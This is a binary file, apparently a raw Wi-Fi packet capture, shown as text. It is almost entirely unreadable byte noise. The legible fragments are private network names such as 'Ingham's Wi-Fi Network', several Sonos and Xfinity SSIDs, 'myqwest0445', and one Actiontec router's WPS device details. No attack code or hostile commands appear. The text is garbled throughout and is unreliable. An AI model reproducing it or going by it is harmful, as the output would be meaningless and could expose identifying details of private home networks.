dZ$/=XxsM8&ݞ:KyQ~IAcގ0;J晠yĢs4m4)-C&HRԺp\NWJ_3.r P.U3r:MCuR=Ý5)"ug%>]mD Ѣ\jU @,X|aX6X|a Y& K^ľ2,]lCMx]NdCXb7ӫ)U6p=jX92{fpV<%CA\EaPPۭp$CB\jU \ =c\jU  a~՛\jU ${\\jU& X6\jU. @,X|aX6X|aY, s65Ny!ha:󂰨0b; RW=%l)v2n{OdaUfT gGf'4 r~~{{Rw A3Əgı!x|ɚ9tRM^dXQYٓ:ckqN[[ \jU2 X6\jU 6 \ =c\jU B a~՛\jUE ՛\jU J a~՛\jUM ՛\jU R a~՛\jUU ՛\jU p @,X X6X Y/ ߑۯ- j s:xmwdͿp-B 3>[;rGgwDQQ lK7ܡ*vį?muȷkSLAg)_© zԬc8R5''_qhk+= M;Ȓ{ %\jUt @,X|aX6X|aY0 PDƮdy#O-uEJn+ DSMdh7H#p*[\"0[HK ,4+Ki^2^U" 2G sڞ٥'ӓuWd>BV\jUx X6\jU( lwx09T\jU T${\\jU ${\\jU T${\\jU ${\\jU a~՛\jU 09\jU 09lwx@l\jU @,X X6X Y1 YhݏtOb+TvBҮMtIMV(5zF`WF^٥cL-?pySjVvb^mRBK2wWft6W\jU @,X|aX6X|aY2 xr=@We%JE~Y9t?H/mK=C>L$ɥC yAvtBiS#Del1b$*KUvY"H\jU a~՛\jU @,X|aX6X|aZ4 HsQ.,у>'uu8KzE,˝E=k5UcIYw*^kMXDVN^sEe =NmGEkr|NNē_Gz*TcgZ NlqUj\j#rv+ԯV@yR\jU X6\jU @,X|aX6X|a Z6 Uz؄`e|8An RxpYbár_"\:{ PƨӰ0½v)Z鱌+Nޥ~KB\jU \ =c\jU d${\\jU \ =c\jU a~՛\jU  ՛\jU a~՛\jU ՛\jU a~՛\jU ՛\jUJ d${\\jU L@,X X6X Z; `V"Z o_.8֥[6&oT0:2snwKg7.7C)msxt&vtQkhon(AZH[I \k1C^=#zP ']~E.ڒIR`wYT2cJپ*2^M"D&"XMM߳\jU X6\jU a~՛\jU H:oͲ*@oͲ*\jU @\jU$ T${\\jU6 T${\\jU <J,\ =c${\${\Pc} t(ht o";yջr=*;\9-/tË]TWw xVU~)qvݾ{Gd."zDsqvݭߍj1a @9u;4b.iL=>l[v!w< w_fseaJz?$nǨpCmN؂neʕdg?.Fh۾_Ět2*U[ĹL񮥨\Bu։hJFcmSu S Jvzt(LJw1GD#P26o p堑HV8O+ڣE=4F#p{yb0pdlkft~ٗ Y9MpGBs2CUƤ `ʮ<#-Qf.se4J@}jTz6TwInJǏĪ (lD]3BB ?˂)cs*[#@y$.C`%!'B@&"rK]Y7Bj㞤{ߦ*+9 p74B5b.-AG&MvU.0\=xJQ>Ol@wc@7,rl"D:f&z Lqc/AVc]ԝfG«iG $L/G¡bfmC]aw[]F*WtQo}XNU f1TU^o; t.* ]go PF$mv]J_ARK\jU @ ${\]jU J0\ =c${\${\Pc} t(ht o";yջr=*;\9-/tË]TWw xVU~)qvݾ{Gd."zDsqvݭߍj1a @9u;4b.iL=>l[v!w< w_fseaJz?$nǨpCmN؂neʕdg?.Fh۾_Ět2*U[ĹL񮥨\Bu։hJFcmSu S Jvzt(LJw1GD#P26o p堑HV8O+ڣE=4F#p{yb0pdlkft~ٗ Y9MpGBs2CUƤ `ʮ<#-Qf.se4J@}jTz6TwInJǏĪ (lD]3BB ?˂)cs*[#@y$.C`%!'B@&"rK]Y7Bj㞤{ߦ*+9 p74B5b.-AG&MvU.0\=xJQ>Ol@wc@7,rl"D:f&z Lqc/AVc]ԝfG«iG $L/G¡bfmC]aw[]F*WtQo}XNU f1TU^o; t.* ]go PF$mv]J_ARK]jU a~՛]jU ${\]jU  \ =c]jU@,X|aX6X|aP[H <[bi w05z=`䱨AJ%HEdS9Kq&V~1ǯ6a߻G)HCWgƠqɔt?]4pVTuwe<fdߌں>@?Q $Btdm6 0V]jU X6]jU @,X X6X `[I uU/au -Ae|Z:+$vݺ&TƨGy1<0ŘV6InUA !V=kLӨ]jU T${\]jU $ T${\]jU( d${\]jU+ h${\]jU 0 \ =c]jU 4 \ =c]jU Ra~՛]jUU ՛]jU Za~՛]jU ^a~՛]jU` ՛]jU f@,X X6X [M }M \[om< `a¨q yc)?Ow>Uk vt$훡}Μ9-7F[nhOG\_ͦحTl]jUh@,X|aX6X|a[N \&,l,*ſ]M"\@kU)kr{ޞD8/G t38j {?>N"x5]jUP X6]jU X T${\]jU ZJ,\ =c${\${\j} #Dsht/{Y? ʤPq_12:ILUkCj{Sȧ>R@obVT 4"{ҭ[V1tGRlř.Rb!"p>ˇȢxZsRCotr(]8lC* LIkNzT*J1t~Yp9q$"`|D ?>hN=5oF ƽuDw{{V&Do^%8 ' 4nCv/|3~V khBO."Ze#BfǑqX`kK*Gy‹s**uG`U|w3!V'=񞊖WÄnH3xK5k#(s&rڊ4n"0r5~a0tLM[gPFuaK vV?ʗeBj(:zTYmk1`~PwSF֭' ;voN| .z|֦נ@ֆYbđ{*Ā)4{.vSyI!$\',9?XE᩸HwB O;w3$$(TX/C0KќPM<1zBesrTREɟ/%e|BYl;;|{ v`akE "K+ydfɁ'A͡8G@ DTvu: UGI2Be"45zYsb-n7Rw!LL2쓌`]t >[x4Y `;&~hJGˮI{OM6 ((d#;ˆlpTH3l9["le|dkmMZ4$2ng9f>1gkSh0 ba\B*G~_A!AK iXL^zWْ+ODxo5S;{>z4WxU@A_Uay?gc\0 S#iO؎.**`A|*1_><(iZ2ih :\$/_D}L%Odp%Kۜ孅߭`c,5Hz\l|AD"[9ѻŦ`GWUL//JJj E4mlYQLHɗ, ]jU^ T${\]jU ba~՛]jU f ${\]jU j@,X X6X \] ڠig$}SInz?PEv7{?Bd~r;2e>oN< NQvIIo*m F_B% T>cjR3d FQFjW y]jUn@,X|aX6X|a\^  PT'}cRsD֝W7n?9 #Zo_OdY\+}#wH[w\zŲs'%+]jUr T${\]jU  \ =c]jU d${\]jU9   `"FudIngham's Wi-Fi Network$0HlUS   #*02 `-=@ w  P'BC^b2/F]jU: d${\]jUWllB33D2\JirgnLwP4c7mOJω5y5lkFz,|hP.ػ?"iw3eٓXd& O"},08!v0DFЙeV󕂱 ^3+ ~,MyS#Q38$1.OT'#[:A]޲=P381w9I/gI4KW,p]`CH7ak!S_|)"n\@L32-S>[2^s|ËLUq1zt!.wqn j#{A'3lQQ] ¹ I&$M]6V1E$=<(.֘s[{1D.CC&_W$fƧ9X"+YGT^lA$3~1wTg=2`ǎv!Ff&(q*Pt =嶖ZZRhnK.+GBJ!I]jU T${\]jU  T${\]jUGƤbƤbsdd xfinitywifi$Hl2`US  *-=J ,P'BC^b2/  z C]jU T \ =c]jU b \ =c]jU d \ =c]jUh d${\]jU l \ =c]jU p \ =c]jU *@,X X6X \_ ^ %+ ۥM6-P1XTM@鮊 7B+n 0~+l}SepI--p)K2$ sa5H^OՀ9!HPz[%!Č*=r<8': @?,G2 *0%3x]jU,@,X|aX6X|a\` U4(vݧ5ummxLR?m G}gZ=^& X׵9XC <5V؜Yl\*91ZD~nK}YГUK믱$x& ^a2Ti؁J<FvkH7&Ypiݾ]jU0 X6]jU8 T${\]jU <a~՛]jU @a~՛]jUD X6]jUH@,X|aX6X|a]b ]6x<4K?S 巯A``hhQNQɞ#+M ~0{D} 2ͻ[b?'6!y#@8H^k]jU L d${\]jU P \ =c]jU T \ =c]jU x@,X X6X ]c +Y2S %vw>'+=SAV^ v ew}hMT"x;O&ntaz`RW0ێrW0Hzx֭w"`)bXAgmT&gdv))oli_-O<ѕ]jU xnn@,X X6X 0]e AoV4 &v_z2wdR]U^߹ m1"2<ՎC P;pv+T)5͌ V8E`[mD":MqC=]jU@,X|aX6X|a]l Iِ"iDE;znaHj/4=%nIm+N &>*f|Iپ4Di^x&@.b_ Bb[1kNn#Ol ,TkªGo.:Ɲ?2,e2aΖJUT8<.>#ٹd@s *@`- 3]jU@ @X|apN Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G7HX635X 9IJ NK0XX|`  X6X|`]jU L a~՛]jU a~՛]jU a~՛]jU ՛]jU @,X X6X `^w  n?`>J*t}{*f+<^im(~D T3x^. F)-H&pXu^xENΪݾ)s3 نT]jU X6]jU d${\]jU \ =c]jU @,X X6X ^y u!p?Ǧ'8`/n G%H }ɵSTq j| 쀽&ǵ<ҥ/^ַ-/6/r#(oB4lɧ 5 aPлGopr'.4ӭU[s=B]jU @,X|aX6X|a^z @6_a6+dUJ+X}QOT6JO~F\\>Q"iJ{a1h&`It<ŕd1:fw+T,VIb}k>unH}誤;v'JUǜ⥞ӗ6zBC]jU X6]jU @,X|aX6X|a^| &wg\]#FJ$_coq0byqs+ DH4 $şI;W;u$03PuL+XH]jU H,X|aX6X|a^| &wg\]#FJ$_coq0byqs+ DH4 $şI;W;u$03PuL+XH]jU @,X|aX6X|a^~ L!މ1Cλa^r@+oծ7z3]DS_OIi,2 oBƈXz*!͠6) ~x3h}5靤]"w=ЊUI̶M`ujK-]FZcNQ/H׵Y#WzТu ]jU X6]jU  a~՛]jU  a~՛]jU @,X X6X ^ z/3gqX~/~±:\DZ $tz{yRU^}\]ˆTmҚ: Th[WqL]`:1?p@Km6]jUX T${\]jU ` a~՛]jU h @,X X6X _ r=t%s.}Gn\'qmTޚuf1`&J32v sDjy⤩`@",g\!2Ds=,.)M(u1/4VQ )9?xnN&aY9hDVJ*]jUl X6]jU p @,X X6X 0_ ~AI׽_hG/WT[yA %GJLԓ 񐔿X8*!1s<` t } Y%r|C/ds]jUt @,X|aX6X|a@_ 4em>j.ƒFFɪgFAkOeI]+n<&}er !mBRuf Յ1YWrK'l]jU| T${\]jU a~՛]jU a~՛]jU @,X X6X p_ mE0(dOL{Fu+do\*EEd6N\ӧ GD2Sf/rRc81^ ڰsq2 Tf]jU T${\]jU @X @s Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G~HX6??X|a6IJ NK$XX  X6X ]jU \ =c]jU T${\]jU a~՛]jU T${\]jU H,X|aX6X|a_ *Gk:/ n%C/IwghWm w_ٙWµ J"_ޓ8W\Y}n*JC1_[f]jU \ =c]jU d${\]jU  \ =c]jU a~՛]jU & a~՛]jU * @,X X6X _ Dx")B-D9T}hkC+D^=sI/4[?VRGjb_qY.؏5,ky-OpӟHGZc]jU. @,X|aX6X|a_ nmco@u/6>x} s: ܃7^JhajæFkSF ;LGGf9xQ|H(M9a'P]jU2 @,X|aX6X|a` b ?389g6fcjl[öP4->ᤵU&&fU>Y83/Efcdp@Jp=$fdSk_*C:"2 QVA2]Yzd5{喏|@]jU6 X6]jUs a~՛]jUv @,X|aX6X|a@` CbUJ*,JsqI,ogv&1-a)o*1VΩiW[Vk@ubRWa `E"ȗ:};Pk]jU l@]jU l@]jU p@]jU p@]jU a~՛]jU H,X X6X P` 4ZC&$W'w۳#֡7AeG&#]9M,[`Vb-9Tӛ("9bHԹb 16oI[bYdU2p[=X9*e V>q &kWH#q .n050?اp]jU  d${\]jU  a~՛]jU  a~՛]jU @,X|aX6X|a` MVH [W=pC&^ؓDW5<{)>O/?1 _5jáY/:h|Ok<&M7h)'=L6S]jU @,X|aX6X|a` (pf\V-ĉ{ ЯuNGw_H hi&u4yQR~kg%ʊ4f(eL\L@U@_<),%w`z (7J@/4TvN.664j;iO:dq]`?6ކBݝjHR8]jU X6]jUF @,X|aX6X|a`  pf`ET\ɭ@ɢHw[S!{mV?j3߶N,H"sWLYZ8-95ǚCB, Nc`E.v'm76\F7et^ӎtG(U87c]jUH X6]jU \ =c]jU \ =c]jU p T${\]jU T${\]jU d${\]jU \ =c]jU d${\]jU \ =c]jU  h${\^jU& T${\^jU T${\^jU \ =c^jU T${\^jU @,X X6X a HtڌƄW;YVNxmFkɷ^jUl@,X|aX6X|aa 2R} ֟s|InsSۃA0Vat{H/,B-m: P`R4<YjQKNNoװBg*OYV~(?噺 cfoeUőM)0 Ll_UJ?tIGMTEj^jUp X6^jU @,X X6X a 54  ZkJ3Hx0DUP;3Wj'On"2uٱ%i؜ƒ[q|ZQ/mcubp,kz*b^jU@,X|aX6X|aa љ@OǪr*qp[RI[ |(#_07O`ж-WڡrLM9<0sx/MJ+=jx 0-N^jU@,X|aX6X|aa tY;؈ﺚʜ0Mat<:%~օA'H#Pi5+ic͡r W#owZN{.l_ɞRd5=nxL6L]̼R44_ [ʔCh [οP\< bbh0^jU X6^jU a~՛^jU a~՛^jU @,X X6X b -"DV/oM=.R3Af )WMzO)HLTyB(ACogTn |=MR* Y(t~|j;+uzYIVM " #ex{y(r?ncU.t^jU@,X|aX6X|a0b #EvY"8D#rő(/={958rb^iPg׳6'Õt OӤ\ \U?|`uX4)0#",g}E0R;hk=*c = d h ׸;gyϯ` O&^jU X6^jUa~՛^jU  T${\^jU X6^jU  T${\^jU a~՛^jU# ՛^jU ,a~՛^jU , T${\^jU. d${\^jU 2 h${\^jUR X6^jUV X6^jU ^ d${\^jU la~՛^jU X6^jU X6^jU @,X X6X b >"΁+&/5).fU^ ÔO$! Lc7+ ǫc&tc峓 z~|j`g5lt1]v|v&cT5l0wg "&$%`~V_=-g"_(WbH M/^jU a~՛^jU H,X X6X c z\9GCϥ . dn\RNEHa*>Pl/&A6pu!(zS¸'bCefD=oBv^jU@,X|aX6X|ac b[aA)5ov2qq>?AoaI' $F<#R^jU ${\^jU T${\^jU a~՛^jU a~՛^jU X6^jU@,X|aX6X|a@c Jp~/x 2\_,Y-CD9j\BpU(8BPPd,Nv!KG">ĿLDFΖm^jU  T${\^jU  \ =c^jU . T${\^jU 2 \ =c^jU| T${\^jU T${\^jU  \ =c^jU  T${\^jU ${\^jU  \ =c^jU F T${\^jUf T${\^jUz T${\^jU ${\^jU  T${\^jU  \ =c^jU " \ =c^jU< T${\^jU @ \ =c^jU T${\^jU T${\^jU T${\^jU T${\^jU X T${\^jU Z \ =c^jU lnn@,X X6X @e fëV|nn%""?Q M)FR7o*kA ,Rv.Ȧt)T}k('0;Ģ4 TuCeA<Rٛ'nN#B=ꑱn*w"$'wZ+8xaM:LzszmzIGBfdWy:>7  ;¤MbMp]E?D`&ÊiVr:)Wĭ2}:~7^XF޹fzBIAX_pu8g) Vi>*r'ud;Asgii*ܹuޅJ"RO:(Y>2uAN.ZѼ)ƣ+Iar>E Yg?x F縗;4*KTC;431iO/& bF*>3[3 }Q16_;C{sȏ<Ќ<כ٧o>ӽFݧKd]QBE}p/BzJ &_A>i5Q]UPV+;p }2+g^gkLLzh`fҌ"69|dUx\W=`//=#\Y(7( h.Vģ/%\c[?C/<޾ O"x&3i-~$ƵM.V=]1*/LSPaS,a'{mF43qU2sA#ZP1Y\! 󆯉`9Z(? } (*WO1ˋ>α:hU^k̸Egܾnɟ fY#BWa 4S(˪~SD̅'A152ﳡL r`Nf%&ͭitaFr Tlݕ(M5gf9/fZ/'Y.P<=wj8gEWMኟa OyT^ 2x Kk2(nGeMD[\as%x[XzjLj1Y x@aBّMteu\^cãCӖ@ۍ_RWsFT be9YBm>[*qKRn,2ul[&H<$ĩk4?DC;r&vV-42;g+~ѶqF^jU T${\^jU \ =c^jU T${\^jU $ \ =c^jUZ T${\^jU^ ${\^jUk T${\^jU T${\^jU* T${\^jU0 ${\^jU  T${\^jU T${\^jU  T${\^jUZZb${\${\ !`-AE˼>)}@0P73uMjq@ b?ş24@^jU  T${\_jU * T${\_jU: ${\_jU >J0\ =c${\${\P~ vNi:ouZ$07S¯v"fxmwى4fu,s}B@j u?J إA%\OWW:w <)>(X+Z:BY: B 4jZI~ނ7bM:ώ"3RUB5^׸kAb=}`yb"Ќ nۋ9 iqĘ@U'LP(<{D~y]4u2^ m"j b|[`82K};A'.)_Mpq:K90t1G?aY @J` RqwB(=%ZD[|'ͦMAH'M2K2OH ڲV%h VeB`*sEܡ'1#;MBa44ڰ Eq49{M^j[m3%6t҉lN3_I.,Fc[ :_hŕ3`ӂ#qaњM/{D+J>L&nX1%\y3ћSc:򂓯(ڰ:!t"t*W*B]Y"Sv<̺@8@=Y>u+Ín{ؾ+eWJG^/h^sLIȳ3sWT֓\KKܔZRU?./.Lٲh6~PUD398q@UQZ*lEkB^>y"} 96ҏCi'HM 81 fmci5(`[j͡|2-^@@@E{Y-/C])Q3М~n;;` 8 vy9b r6\pyú|rقfQ#L& q,W@U5ף op}VUSaejC-8u9iSnIVqe~햋Kv r6uR6 8̛0V7D$E}գ7j;%(JpPEV*C,(2 )ĩƥL:ei{@;׌Nq@,9r5FRUQ^C#32N `5x[8_jUn X6_jU@X|aN Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G:HX635X 9IJ NK0XX|`  X6X|`_jU T${\_jU  T${\_jU  T${\_jU  \ =c_jU zz@X6e Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX ?X|a?IJNK#XX6 X6_jU  T${\_jU  \ =c_jU T${\_jU  T${\_jU  T${\_jU  ${\_jU J,\ =c${\${\~ S)9@D ӭ!/Tk 6,_;"Ad Hꏖ?s7왧;/?Ȩwr-2963רki6N|JZqA3xS2Q,tlGh Y$͚++VUIZ@9*o ҧ+uM^~4b:ouguWAy$1 ;Zn"jwD0>6 @nV'bEɒ/; zohneֵMò{^?3 S':՗Yܵ)t%`QXZ:1p:`tEs&Jz>Hp`GS *St~ӡDx+iy/!1i;VA"7!"u9Th )`R01@xz@m9>U^-aJѿXXл`O8`Ӕz_!"gLW)g3kSAx/PrPoʹk=;%nn:Z'9[*,)8Z{B[Dms+Q~4/.f%VN~L 83 3![g%NeK{Krt#Hl5O񘚚Dܾq*oʱGH̕|Q1}7ʗѩU&&wU}Ʌ;7FV *B\e_ y-a./U^=U5e)4qs~:ߥ2zg5/JyQynx4i]Nk\pX}$Dd۝E7``-NIxt&T!! y>@ \p[dp$t_ "TTγRiq82)5wpyOsJ1&5JH\$4վ*]Ҋ}tÍk3+z'PU:᳻RQc4oޙķltgXֱ*1 1{(;M3G~%.`4*QxEeؤJ(jSb h^o+Jм gn҈Ro.jFb%(B̴A{u'xZ~8 u(F/ͽb."&iZbߘaLTj:Ӑi<|(10[Jצω'hp>|x(7VGihQFNHrĉ7 'bRiP%rnEZDul>YIp{}QԮ>ly%sЉJ+ i4w88N`]eS1}an,p~FJh[UN{r#8> [ث;j 9QVgl8D0hSQiQԠ9=N4)Z$siE*ݢL@ʼpQnA^q7fa$Ύ۔YΎwL|W8 }T\a fT6A)cYt4/$;Ѿ#*8Y+S`4*QxEeؤJ(jSb h^o+Jм gn҈Ro.jFb%(B̴A{u'xZ~8 u(F/ͽb."&iZbߘaLTj:Ӑi<|(10[Jצω'hp>|x(7VGihQFNHrĉ7 'bRiP%rnEZDul>YIp{}QԮ>ly%sЉJ+ i4w88N`]eS1}an,p~FJh[UN{r#8> [ث;j 9QVgl8D0hSQiQԠ9=N4)Z$siE*ݢL@ʼpQnA^q7fa$Ύ۔YΎwL|W8 }T\a fT6A)cYt4/$;Ѿ#*8Y+SS(^x|(˅k`jU T${\`jU@X|a O Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G<HX635X 9IJ NK0XX|`  X6X|``jU T${\`jU T${\`jU  T${\`jU 0 d${\`jU J T${\`jU j T${\`jU l l${\`jU x T${\`jU T${\`jU T${\`jU ${\`jU  T${\`jU  T${\`jU  p${\`jU a~՛`jU ՛`jU a~՛`jU ՛`jU @,X X6X pf r('~S8y^a5$6Ôrhhʯ^cFM~L˶W1Uj CPWf#%QX˭(0IiY Ui`jU T${\`jU  \ =c`jU  T${\`jU  \ =c`jU  T${\`jU  T${\`jU  d${\`jUNNB0909_ϲr"!^/'L*0]ds_mrill|`jUR T${\`jU]P:( `$SwudIngham's Wi-Fi Network$0HlUS   #*02 `-=@ w  P'BC^b2/F`jU  T${\`jUb ڨ෱MA0nk8\ݢQ>Co*RT#{V¿-UwǟR6#[ЦMAw0$;fUhUJ9k} lD`jUB ڨ෱MA@o &Ml309T[N;uJ%~sc/#(`z#y$GdvDRk<*-yK4cɚ8tUz]+Yk^NIE6FhCH1,E(˸Y@kW=7;G>M hsO+2Hg$2L/n|fzYD4yo&ϙܺW 3QPu6q=j: ߽Ä=>ExZ%4+zt-30(z+{UEea`p_2;f*hOsuDڮKe>N1,)\'e:09T MTc0 ^!xbF\g[>s\az@x6L/@NDQhY\!];3ԡEtpDb "F[UK޲5O=Ԇ<)nܘMnf,RzId$5si%zg 2>`s846ZNP}{D3纈WSa.;EL_/BA6 s4D1sT˸8'8sn/X\ 0Sy_o2+Y:݃YKɯ|IDC>\sΩzIQauzLg/*{>F`uqFzL, 6'o%~Է.6xCڢќJ `Ĺb2Er.i̲Čq ([p 8M8g_xnI3t/Ggvfa˾Ŷ_k}OĥlzLXБ,X"W0#[SY8ު?3H)V&9cXTY-MYi26 wU`A܈[xEX/^P~:o"!m[`jU  T${\`jU T${\`jUJ T${\`jUj T${\`jU l d${\`jU | T${\`jU ~ \ =c`jU @~+D2\<`jU R zz@X6f Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX ?X|a?IJNK#XX6 X6`jU V T${\`jU T${\`jU T${\`jU d${\`jU \ =c`jU @X @t Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX6??X|a6IJ NK$XX  X6X `jU \ =c`jU  ${\`jU . ${\`jU T${\`jU ${\`jU J,\ =c${\${\@Ν~ ^u#9'M<fNy]ܓKGۺNf'U>mvIӭj$'Rf8[j3wd؝dt]0n(j*[yu#OЋ@x Қ'{n X%o+3X*@gHSa1O ;bjPG>6h#VݏùQnFx* 䃥 9C1 4J%P el_\]?+~grfϩ!9I\9͟1 Yw„!0`Bh1 dGnmws?2fNxT{e]SNR 7d ӪabWiX&+G&.rԲ1Uvmj-a @  "wvAlܰpYx:SњMOS'.UQ`$knE:jU{3G.Kw`p-d;OfdR]d塱3dm5:Bl=6EI8` kIۘb92|T{8/L8C8Ϧ_^ˆ5LV)Z ?nP\SAv,n߬߯ѫO O9%Y Y]b;x%] X]q)xmiIZQK(RL_IfQ-Nienog-ȡB00kŦ, Zfhv>[8a/ v#RJ1_&}o<"KQ Cי$"PkZko`(ʪa5v/(>ˣc-q/Pyr\'P vCc˛C<(ڧt78+1֝"xZ|Ю+jŴ68Uzc|=kz1;6MҺR-|8Fb@fK*+V Ok:{Jb!@DO?"y[p>n>v-K"T" {6]E] fkT2ر53b[:!FN.'1y_Ӡ!.vjLsZ쯮 0_ yYeߋ#XJ u?\rmmKH \T=Vn9cE.ϸݍAm5Ng3"K(Bmd'l(d6&Eއ4_\9ɫ 2UZ+i4o2 :T 4Pg^|aGqJ)ϹJeD˦hYd:]n5FkrrDIsv[?:A2t-991oS|MQ3zP| A"XrZ3 I\{*/ PM dTF)9&Wpmq d%Mt}>3S`jU H:oͲ*@oͲ*`jU @`jU l@`jU l@`jU p@`jU p@`jU p@`jU p@`jU p@`jU p@`jU T${\`jU ${\`jU0 T${\`jU: X `jU> X|a`jUB @,X6X|aX6pO{-uNIqȖ ޏ\X64|j.pv0eӈw%)ڼS.Τ15+sy5D*w$F4,K? WZ`jU F @,X X6X f [~Ar=N e0N(?;L.歇GN O0[f0E Ƕt㼟gR,=؉x< hxhb#FB4655߁ (=6Dk^vi#*$ D"t@id޻N r9Xӯsly0?^dqZ|d.6@;VDN=*kͭ0/_Su)TUueN?0z϶skgET8m³&!do\8gjv?|V%2P2x A/u`3!U`!A^4N 0?T̊Osa 8 m&CZZ'ws/OҾ2퓲u3n /Q޵e;ޭO M+L’tޱfPzO%Z3 j{#f8Q8}po_ k4ūED] X^,0^\m geOLRuGbp>-wۖ#uEºG"]*>Go֭k"<̼ͮbbWȊsh֦GBZhtnir#q^~h乔{‡PkxJ>FJ`利x$l ЇnZ9E!L7PĽZ?_&WYS8)?g{B,5zASbVZ3H brv[3}7}͊ѼIC UD}^|VtǤ2y@:5 W |[V47m3AZ 5lĢcL!inEl  9gdOZ_"1V.4Rր0#VO2MʫO CDkuf>}UHrtz՛r|P=Pīx)V"!F)b%+lv5 =^>|^xM@5)>!,l@I@1yA"碀,?f gsq@,dpB80n&jT ȻE֩Z;[uLV)g*L6l)$;yl5mC34G)l7B[|p9!!;hdxΗ -e9z`7(xU<-@xC >ǻr3l{)Bk=R2 NCeSHn Ou`.e# ,=>HWO|rRn2-uǦKe?.k{ʈ O;9VV֒.Uh`Map.Ͳw1R.*NmD* 7 9P>݅tmѰσSb%Z%*Ύu,[|o)~^FbD P|x9 e:3jL_}492;!_w CTs|$'5 `jU J\ =c${\${\ϭ~ Ƶ]`F5874I&i@<Zk>4655߁ (=6Dk^vi#*$ D"t@id޻N r9Xӯsly0?^dqZ|d.6@;VDN=*kͭ0/_Su)TUueN?0z϶skgET8m³&!do\8gjv?|V%2P2x A/u`3!U`!A^4N 0?T̊Osa 8 m&CZZ'ws/OҾ2퓲u3n /Q޵e;ޭO M+L’tޱfPzO%Z3 j{#f8Q8}po_ k4ūED] X^,0^\m geOLRuGbp>-wۖ#uEºG"]*>Go֭k"<̼ͮbbWȊsh֦GBZhtnir#q^~h乔{‡PkxJ>FJ`利x$l ЇnZ9E!L7PĽZ?_&WYS8)?g{B,5zASbVZ3H brv[3}7}͊ѼIC UD}^|VtǤ2y@:5 W |[V47m3AZ 5lĢcL!inEl  9gdOZ_"1V.4Rր0#VO2MʫO CDkuf>}UHrtz՛r|P=Pīx)V"!F)b%+lv5 =^>|^xM@5)>!,l@I@1yA"碀,?f gsq@,dpB80n&jT ȻE֩Z;[uLV)g*L6l)$;yl5mC34G)l7B[|p9!!;hdxΗ -e9z`7(xU<-@xC >ǻr3l{)Bk=R2 NCeSHn Ou`.e# ,=>HWO|rRn2-uǦKe?.k{ʈ O;9VV֒.Uh`Map.Ͳw1R.*NmD* 7 9P>݅tmѰσSb%Z%*Ύu,[|o)~^FbD P|x9 e:3jL_}492;!_w CTs|$'5 `jU  T${\`jU  T${\`jU  ${\`jU  \ =c`jU T${\`jU H:oͲ*@oͲ* `jU @`jU  d${\ajU nn@,X|aX6X|af ,|o7 ;/KTU/:[R;0Mq$l7ʬ-eó3ajU# F՛ajU(ppB՛X @l!rw,e#5 6=;8= m}^LW2agjǠ:lQ ԖBz=RajU, T${\ajU 0 \ =cajU f \ =cajU j \ =cajU p T${\ajU d${\ajU \ =cajU T${\ajU ${\ajU : \ =cajU : \ =cajU L \ =cajUjZZb${\${\!`f.Yiɶ{ -#?^d1̹+ÎE^^LQ{ajU T${\ajU  ${\ajU@X|aO Sonos_ynFI1HY4cF3gqPuljCuicmFZ66G>HX635X 9IJ NK0XX|`  X6X|`ajU  T${\ajU  ${\ajU T${\ajUbbb${\0!` )iˍϨ(be}r&'uGٕmI]{' buR EQɻajU  d${\ajU  \ =cajU 8 T${\ajU n ${\ajU r T${\ajU d${\ajU  \ =cajU  \ =cajU T${\ajU  \ =cajU 2 d${\ajU 4 h${\ajU8 t${\ajU <ddJ,\ =c${\${\~ 0XU!l,гғ$ 7fr pZ#d~RTW|L,"1DzajU  \ =cajU T${\ajU  d${\ajU  \ =cajU T${\ajU  ${\ajU ${\ajU ( d${\ajU , \ =cajUf T${\ajUv T${\ajU  h${\ajU  \ =cajU  \ =cajU  T${\ajU  \ =cajU , \ =cajU  ${\ajU  T${\ajU T${\ajU  ${\ajU  T${\ajU d${\ajU ${\ajU @ \ =cajUnzz@X6g Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX ?X|a?IJNK#XX6 X6ajU  h${\ajU ddJ,\ =c${\${\~ ǖN i|Ce PPs%=R)йYh|qVfU5rK5ajU  \ =cajU  \ =cajU  d${\ajU T${\ajU  T${\ajU  \ =cajU  \ =cajU  d${\ajU 2 T${\ajU H T${\ajUx d${\ajU T${\ajU  T${\ajU  \ =cajU  \ =cajU d d${\ajU h \ =cajU P:\${\${\pa "d myqwest0445*02 $0H`lPPPPzPJD;G`~٩ <!TI#APDK71$7100B1234321TPActiontec Registrar PK5000ajU <<P:\$ "d*2 $0H`lajU d${\ajU T${\ajU8 ${\ajU< T${\ajU L zz@X6@g Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX ?X|a?IJNK#XX6 X6ajU X \ =cajUZ d${\ajU \ \ =cajU ` \ =cajU d${\ajU @X t Sonos_ynFI1HY4cF3gqPuljCuicmFZ66GHX6??X|a6IJ NK$XX  X6X ajU. T${\ajU T${\ajU ${\ajU T${\ajU ${\ajU T${\ajU d${\ajU" d${\ajU * h${\ajU , ddJ,\ =c${\${\~ 1Y=r!0U/FaVO @ ? 0WC0@/Ț.J7~lַyajU 2 \ =cajU: X|aajU d${\ajU \ =cajU \ =cajU  T${\ajU- T${\ajU X h${\ajU b t${\ajUt \ =cajU d${\ajU  \ =cajU 0 T${\ajUH T${\ajU N \ =cajU  h${\ajU  \ =cajU T${\ajU T${\ajU ${\bjU d${\bjU| ]objU d${\bjU \ =cbjU T${\bjU ${\bjU J,\ =c${\${\  ham=%/8sYCnmGgX#QSQ|'3\ze[ j>dЯgS{q<xU}[#Ml+5;PQ.3oD,12,J:l 1T}Z)'8X5RJX4t)]Bn R)˱̣#XYAœo )sN -4>sDuA2yT]ʙ Z7)4-cԄn5|'5u|[=S0;*)8X)D']pN!lLǕ+/.q`!2tW~sɁԄo>zjI/CRsyniJR>|>KM&|TWz>>Fe~O0j'ðFOώr6sttϛ$sL0bԴ}.㫂ė*m"%DMy䖅'K7}-=4F=ȡ"*R;NߊRS|M<H$k$|WH![@ ˮe1 YMDȋПwW= ;l\!j,ϭ~~^n wU$i6ƨVlbS5 (9Ӑ"-˸vg}#Vb񖸠ux#<@D᧯۴` 4QQ$1=WrXnBքWi)6_<}Q*8tcL6?9G(pɞ}]/ۇ=>Jxe[0y%l9v)fx%gdWN+*E1Q1z94޲+S|U.ZJAWQ;K*G^*y 5nMz 